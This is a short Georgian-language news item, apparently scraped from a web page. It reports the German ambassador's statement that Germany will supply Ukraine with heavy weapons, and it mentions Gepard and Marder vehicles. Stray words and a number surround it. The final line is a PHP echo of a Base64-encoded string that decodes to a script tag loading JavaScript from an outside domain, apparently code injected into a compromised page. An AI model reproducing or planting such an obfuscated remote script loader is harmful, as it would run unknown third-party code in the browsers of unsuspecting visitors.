celsiusi
ავერსი საქკაბელი
გერმანია უკრაინას მძიმე შეიარაღებას გადასცემს და ეს გადაწყვეტილება საბოლოოა, – ამის შესახებ უკრაინაში გერმანიის ელჩმა, ანკა ფელდგუზენმა განაცხადა.
 
„გეპარდის“ ტიპის ტანკებზე საუბრისას დიპლომატმა აღნიშნა, რომ მათი შეძენა პირდაპირ მწარმოებელთან არის შესაძლებელი, თუმცა ექსპორტის უფლება ხელისუფლებამ უნდა გასცეს. რაც შეეხება „მარდერებს“, ფელდგუზენის თქმით, ეს ტექნიკა უკვე ათი წელია, სადგომზე დგას და ბრძოლისუნარიანი არ არის, შეკეთებას საჭიროებს.
 
„ყველა დეტალი არ ვიცი, თუმცა ჩვენი გადაწყვეტილება საბოლოოა – უკრაინას გადავცემთ მძიმე შეიარაღებას“, – განაცხადა ელჩმა.
616
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");